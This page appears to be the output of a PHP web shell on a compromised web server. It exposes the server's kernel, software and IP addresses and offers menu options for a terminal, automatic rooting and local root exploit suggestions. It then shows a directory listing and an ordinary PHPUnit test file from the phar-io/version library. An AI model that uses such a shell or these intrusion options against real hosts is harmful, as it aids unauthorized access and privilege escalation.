Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.152.124
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
phar-io /
version /
tests /
Unit /
Delete
Unzip
Name
Size
Permission
Date
Action
AbstractVersionConstraintTest.php
790
B
-rw-r--r--
2018-07-08 09:00
AndVersionConstraintGroupTest.php
1.73
KB
-rw-r--r--
2018-07-08 09:00
AnyVersionConstraintTest.php
1.02
KB
-rw-r--r--
2018-07-08 09:00
ExactVersionConstraintTest.php
1.62
KB
-rw-r--r--
2018-07-08 09:00
GreaterThanOrEqualToVersionConstraintTest.php
1.67
KB
-rw-r--r--
2018-07-08 09:00
OrVersionConstraintGroupTest.php
2.23
KB
-rw-r--r--
2018-07-08 09:00
PreReleaseSuffixTest.php
1.26
KB
-rw-r--r--
2018-07-08 09:00
SpecificMajorAndMinorVersionConstraintTest.php
1.38
KB
-rw-r--r--
2018-07-08 09:00
SpecificMajorVersionConstraintTest.php
1.3
KB
-rw-r--r--
2018-07-08 09:00
VersionTest.php
3.68
KB
-rw-r--r--
2018-07-08 09:00
Save
Rename
<?php /* * This file is part of PharIo\Version. * * (c) Arne Blankerts <arne@blankerts.de>, Sebastian Heuer <sebastian@phpeople.de>, Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace PharIo\Version; use PHPUnit\Framework\TestCase; /** * @covers \PharIo\Version\Version */ class VersionTest extends TestCase { /** * @dataProvider versionProvider * * @param string $versionString * @param string $expectedMajor * @param string $expectedMinor * @param string $expectedPatch * @param string $expectedPreReleaseValue * @param int $expectedReleaseCount */ public function testParsesVersionNumbers( $versionString, $expectedMajor, $expectedMinor, $expectedPatch, $expectedPreReleaseValue = '', $expectedReleaseCount = 0 ) { $version = new Version($versionString); $this->assertSame($expectedMajor, $version->getMajor()->getValue()); $this->assertSame($expectedMinor, $version->getMinor()->getValue()); $this->assertSame($expectedPatch, $version->getPatch()->getValue()); if ($expectedPreReleaseValue !== '') { $this->assertSame($expectedPreReleaseValue, $version->getPreReleaseSuffix()->getValue()); } if ($expectedReleaseCount !== 0) { $this->assertSame($expectedReleaseCount, $version->getPreReleaseSuffix()->getNumber()); } $this->assertSame($versionString, $version->getVersionString()); } public function versionProvider() { return [ ['0.0.1', '0', '0', '1'], ['0.1.2', '0', '1', '2'], ['1.0.0-alpha', '1', '0', '0', 'alpha'], ['3.4.12-dev3', '3', '4', '12', 'dev', 3], ]; } /** * @dataProvider versionGreaterThanProvider * * @param Version $versionA * @param Version $versionB * @param bool $expectedResult */ public function testIsGreaterThan(Version $versionA, Version $versionB, $expectedResult) { $this->assertSame($expectedResult, $versionA->isGreaterThan($versionB)); } /** * @return array */ public function versionGreaterThanProvider() { return [ [new Version('1.0.0'), new Version('1.0.1'), false], [new Version('1.0.1'), new Version('1.0.0'), true], [new Version('1.1.0'), new Version('1.0.1'), true], [new Version('1.1.0'), new Version('2.0.1'), false], [new Version('1.1.0'), new Version('1.1.0'), false], [new Version('2.5.8'), new Version('1.6.8'), true], [new Version('2.5.8'), new Version('2.6.8'), false], [new Version('2.5.8'), new Version('3.1.2'), false], [new Version('3.0.0-alpha1'), new Version('3.0.0-alpha2'), false], [new Version('3.0.0-alpha2'), new Version('3.0.0-alpha1'), true], [new Version('3.0.0-alpha.1'), new Version('3.0.0'), false], [new Version('3.0.0'), new Version('3.0.0-alpha.1'), true], ]; } /** * @dataProvider invalidVersionStringProvider * * @param string $versionString */ public function testThrowsExceptionIfVersionStringDoesNotFollowSemVer($versionString) { $this->expectException(InvalidVersionException::class); new Version($versionString); } /** * @return array */ public function invalidVersionStringProvider() { return [ ['foo'], ['0.0.1-dev+ABC', '0', '0', '1', 'dev', 'ABC'], ['1.0.0-x.7.z.92', '1', '0', '0', 'x.7.z.92'] ]; } }